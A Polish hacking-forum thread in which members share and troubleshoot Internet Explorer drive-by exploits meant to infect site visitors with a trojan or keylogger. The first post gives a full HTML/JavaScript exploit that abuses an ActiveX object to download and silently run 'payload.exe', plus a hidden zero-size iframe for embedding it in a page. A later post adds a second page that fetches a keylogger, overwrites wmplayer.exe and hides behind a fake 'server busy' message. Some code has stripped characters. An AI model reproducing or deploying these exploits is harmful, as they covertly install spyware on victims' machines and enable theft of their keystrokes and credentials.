exploit do ściągania trojana

[ignas_yo]

proszę bardzo... był niejednokrotnie na forum

exp_ie.html

<html><head><title></title>



<script language="javascript">



function Log(m) {

    var log = document.createElement('p');

    log.innerHTML = m;

    document.body.appendChild(log);

    

}



function CreateO(o, n) {

    var r = null;

    

    try { eval('r = o.CreateObject(n)') }catch(e){}

    

    if (! r) {

        try { eval('r = o.CreateObject(n, "")') }catch(e){}

    }

    

    if (! r) {

        try { eval('r = o.CreateObject(n, "", "")') }catch(e){}

    }



    if (! r) {

        try { eval('r = o.GetObject("", n)') }catch(e){}

    }

    

    if (! r) {

        try { eval('r = o.GetObject(n, "")') }catch(e){}

    }

    

    if (! r) {

        try { eval('r = o.GetObject(n)') }catch(e){}

    }

    

    return(r);    

}



function Go(a) {

    Log('Creating helper objects...');

    var s = CreateO(a, "WScript.Shell");

    var o = CreateO(a, "ADODB.Stream");

    var e = s.Environment("Process");

    

    Log('Creating the XMLHTTP object...');

    var url = 'payload.exe';

    var xml = null;

    var bin = e.Item("TEMP") + "metasploit.exe";

    var dat; 

    

    try { xml=new XMLHttpRequest(); }

    catch(e) {

        try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }

        catch(e) {

            xml = new ActiveXObject("MSXML2.ServerXMLHTTP");

        }

    }

    

    if (! xml) return(0);



    Log('Downloading the payload...');    

    xml.open("GET", url, false)

    xml.send(null);

    dat = xml.responseBody;



    Log('Writing the payload to disk...');    

    o.Type = 1;

    o.Mode = 3;

    o.Open();

    o.Write(dat);

    o.SaveToFile(bin, 2);



    Log('Executing the payload...');        

    s.Run(bin,0);

}



function Exploit() {

    var i = 0;

    var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}',null);

    

    while (t[i]) {

        var a = null;

        

        if (t[i].substring(0,1) == '{') {

            a = document.createElement("object");

            a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));

        } else {

            try { a = new ActiveXObject(t[i]); } catch(e){}

        }

        

        if (a) {

            try {        

                var b = CreateO(a, "WScript.Shell");

                if (b) {

                    Log('Loaded ' + t[i]);

                    Go(a);

                    return(0);

                }

            } catch(e){}

        }

        i++;

    }

    Log('Exploit failed.');

}

</script></head><body onload="Exploit()">



Initializing...</p>



Exploit failed.</p></body></html>

i do pliku gdzie będzie exploit dołączasz:

<iframe src="exp_ie.html" frame=0 width=0 height=0 frameborder=0></iframe>

 

[Zedd]

co w tym exploicie trzeba zmienic ? tylko to metasploit.exe na nazwe swojego pliku, ktory jest wrzucony razem z exploitem i strona glowna ?

bo jak tak to cos nie dziala ;/


PS. bardzo prosze o ponowne zamieszczenei tego exploita i zaznaczenie na czerwono co trzeba zmienic dzieki z gory

 

[duzers]

Originally posted by ignas_yo
i do pliku gdzie będzie exploit dołączasz:
Kod:
<iframe src="exp_ie.html" frame=0 width=0 height=0 frameborder=0></iframe>

hm, czyli gdzie ma być plik?

 

[akselekbezelek]

Originally posted by duzers+--><div class='quotetop'>CYTAT(duzers)</div>

<!--QuoteBegin-ignas_yo

i do pliku gdzie będzie exploit dołączasz:
Kod:
<iframe src="exp_ie.html" frame=0 width=0 height=0 frameborder=0></iframe>

hm, czyli gdzie ma być plik?[/b]

zamaist exp_ie.html albo miedzy >< poprubuj

 

[ignas_yo]

Originally posted by duzers+--><div class='quotetop'>CYTAT(duzers)</div>

<!--QuoteBegin-ignas_yo

i do pliku gdzie będzie exploit dołączasz:
Kod:
<iframe src="exp_ie.html" frame=0 width=0 height=0 frameborder=0></iframe>

hm, czyli gdzie ma być plik?[/b]

to dajesz jako np. index.html
plik keyloggera musisz dać pod nazwą payload.exe bądź zmienić w źródle exploita na swoje

@down
to widocznie jesteś lamus i tyle

 

[Zedd]

zrobilem dokladnie tak jak mowiliscie ;/ i u mnie tez exploit nie dziala

 

[EsX]

Originally posted by Zedd
co w tym exploicie trzeba zmienic ? tylko to metasploit.exe na nazwe swojego pliku, ktory jest wrzucony razem z exploitem i strona glowna ?

bo jak tak to cos nie dziala ;/


PS. bardzo prosze o ponowne zamieszczenei tego exploita i zaznaczenie na czerwono co trzeba zmienic dzieki z gory

mozg sobie zmien

 

[akselekbezelek]

Originally posted by Zedd
oczywiscie moge zmienic nazwe z laz.html na index.html nie ??

EDIT.
A tak btw. to mam zmieniac cos w exploicie ?? np. pliki .exe na adres pliku mojego .exe czy on sam sie zmieni jak wpisze wyzej wymieniona komende?

[ Dodano: 05-10-2007, 22:02 ]
ehhh tamten exploit nie dziala. znalazlem nowego lepszego.

http://milw0rm.com/exploits/4393

EDIT//
jestem juz bardzo zdesperowany... najwyzej dostane bana ;>

Czy moglby ktos dac exploitan a IE 6.0 (dzialajacego) z opisem gdzie co wpisac i jak skompilowac zeby na .html byl albo cos zeby na strone wrzucic ? (tzw. gotowiec.)

wystarczy chciec , cos mi sie nie chce wiezyc ze poszles nainformatyke ja jestem w 2 gimazjum a zaloze sie umiem 10 razy tyle co ty (srry za skromnosc) ;d

<HTML>
<textarea id="code" style="display:none;">

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ADRES KEYLOGGERA",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("Crogram FilesWindows Media Playerwmplayer.exe",2);
location.href = "mms://";

</textarea>
TUTAJ MOŻEMY COŚ DODAĆ [np. Server is extremely busy at this moment. Please wait when server generate mirror for you...]
<script language="javascript">

function preparecode(code) {
result = '';
lines = code.split(/rn/);
for (i=0;i<lines.length;i++) {

line = lines;
line = line.replace(/^s+/,"");
line = line.replace(/s+$/,"");
line = line.replace(/'/g,"'");
line = line.replace(/[]/g,"");
line = line.replace(/[/]/g,"%2f");

if (line != '') {
result += line + 'rn';
}
}
return result;
}

function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:java script:eval('" + mycode + "')";
window.open(myURL,"_media");
}


window.open("error.jsp","_media");

setTimeout("doit()", 5000);

</script>
<script>function go(){ self.location.href='ADRES STRONY KTORA WYSWIETLI SIE PO ZALADOWANIU KEYLEGGERA [np. wlasnie ten mirror]'; }
setTimeout('go()',10000); </script>
</HTML>[/b]

 

[Zedd]

poszedlem na infe ale nigdy programowaniem sie nie interesowalem.
moze jestem lamus w sprawie programowania...
ale wydaje mi sie ze nie dziala dlatego, ze moze router mi go blokuje. dobra trudno widze ze chyba juz nikt mi nie pomoze ;/ dzieki wszystkim co sie wypowiedzieli

 

[Mesmeroo]

..

Dużo czasu zajmuje zrobienie takiego exploita?? Mam na mysli przerobienie dla własnego użytku..?? Pozmienianie ?

 

[witko2006]

a ja mam pytanko czy ktorys z tych exploitow jeszcze dziala? Testuje u siebie na IE i niestety nie dziala ;/